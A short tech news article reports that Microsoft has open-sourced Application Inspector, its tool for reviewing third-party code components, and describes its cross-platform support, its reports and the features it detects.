Microsoft Application Inspector, the company's internal tool for testing third-party components, is now open source and available to all. With the release, Microsoft hopes to prod developers to think more carefully about trusting someone else's code.
“How well do you understand what all those external software components actually do?” it poses. “You may find that you're placing as much trust in each of the thousands of contributors to those components as you have in your in-house engineering team.”
The tool is built on .NET Core, and as such runs across Linux, Windows, and macOS. However, Microsoft touts other benefits over static analysis tools. Firstly, Application Inspector doesn't just flag bad practices – it displays all characteristics it has analyzed as interesting so that a human can review them.
It's also suitable for use over time. It'll notice key changes to components' feature set and point them out. This can help web developers identify backdoors, unexpected features, or additions that increase the likelihood of a successful attack.
Once run, Application Inspector creates a JSON or Interactive HTML report that's simple to understand at a glance. You can then drill down into the details to review specific code or see the confidence level for Microsoft's analysis. It says it can accurately detect the following:
- Application frameworks (development, testing)
- Cloud / Service APIs (Microsoft Azure, Amazon AWS, and Google Cloud Platform)
- Cryptography (symmetric, asymmetric, hashing, and TLS)
- Data types (sensitive, personally identifiable information)
- Operating system functions (platform identification, file system, registry, and user accounts)
- Security features (authentication and authorization)
This isn't in any way a substitute for a robust human review, but it can let devs quickly check for more well-known issues and it's certainly better than nothing at all.